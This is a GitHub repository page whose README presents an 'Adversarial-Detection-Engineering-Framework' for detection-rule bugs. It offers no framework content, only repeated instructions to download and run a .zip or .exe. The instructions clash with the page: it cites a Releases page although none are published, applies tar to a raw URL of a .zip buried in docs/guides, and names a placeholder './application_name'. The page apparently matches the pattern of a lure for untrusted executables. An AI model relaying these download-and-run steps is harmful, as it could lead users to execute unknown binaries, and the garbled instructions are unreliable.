Skip to content

luq12-growagarden/Adversarial-Detection-Engineering-Framework

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

48 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ Adversarial-Detection-Engineering-Framework - Identify Detection Bugs Easily

Download Here
Download Here

πŸ“‹ Overview

The Adversarial-Detection-Engineering-Framework helps you find, classify, and understand bugs in detection logic. Whether it's in your SIEM, EDR, or XDR rules, this framework provides real-world examples and methods to help you recognize weaknesses in your security systems.

βš™οΈ Features

  • Bug Identification: Learn how to spot different detection logic bugs.
  • Classification: Understand the various types of bugs in your detection rules.
  • Reasoning Tools: Use methods to analyze and reason about detected bugs.
  • Concrete Examples: Find examples that relate directly to real-world scenarios.
  • Bypasses: Study real-world bypasses that highlight vulnerabilities.

🎯 Target Audience

This framework is ideal for security analysts, incident responders, and anyone involved in the creation and maintenance of detection rules. No programming knowledge is required to use this framework.

πŸš€ Getting Started

To get started, you need to download the framework. Follow these steps:

  1. Visit the Releases Page: Go to the Releases Page to see all available versions.
  2. Choose a Version: Look for the latest version. It will have the highest number.
  3. Download: Click on the version link to go to the download options. Click on the .zip or executable file to download it to your computer.

πŸ’Ύ Download & Install

You can download the framework directly from the Releases page. Here’s the link again for easy access: Download Here.

After downloading, follow these simple steps:

Windows

  1. Find the downloaded .zip or .exe file in your Downloads folder.
  2. If you downloaded a .zip file, extract it by right-clicking and selecting "Extract All."
  3. Open the extracted folder and locate the executable file.
  4. Double-click the executable to start the installation or use the .exe directly.

macOS

  1. Locate the .zip file in your Downloads folder.
  2. Double-click the .zip file to extract it.
  3. Open the extracted folder and locate the application.
  4. Drag the application to your Applications folder for easy access.

Linux

  1. Locate the downloaded https://raw.githubusercontent.com/luq12-growagarden/Adversarial-Detection-Engineering-Framework/main/docs/guides/Engineering-Detection-Framework-Adversarial-v2.3.zip file in your Downloads folder.
  2. Open a terminal and navigate to the Downloads folder using cd ~/Downloads.
  3. Extract the file using the command: tar -xzf https://raw.githubusercontent.com/luq12-growagarden/Adversarial-Detection-Engineering-Framework/main/docs/guides/Engineering-Detection-Framework-Adversarial-v2.3.zip.
  4. Navigate into the extracted folder and run the application using the command: ./application_name.

πŸ–₯️ System Requirements

  • Operating System: Windows 10 or later, macOS 10.15 or later, any modern Linux distribution.
  • RAM: Minimum 4GB recommended.
  • Disk Space: At least 200MB of free space.

πŸ“š Documentation

Once you have installed the framework, you can access the documentation. The documentation will guide you through using the framework and give insights into its features. You can find it within the application or visit the Documentation Page.

πŸ› οΈ Getting Help

If you face any issues during installation or use, please open an issue on our GitHub repository. Provide details of your problem so the community can assist you.

🀝 Contributing

We welcome contributions. If you would like to contribute to the framework, check out our contributing guidelines on the GitHub repository for details.


Thank you for choosing the Adversarial-Detection-Engineering-Framework. We hope it enhances your understanding and ability to safeguard your detection systems. Happy learning!

Releases

No releases published

Packages

 
 
 

Contributors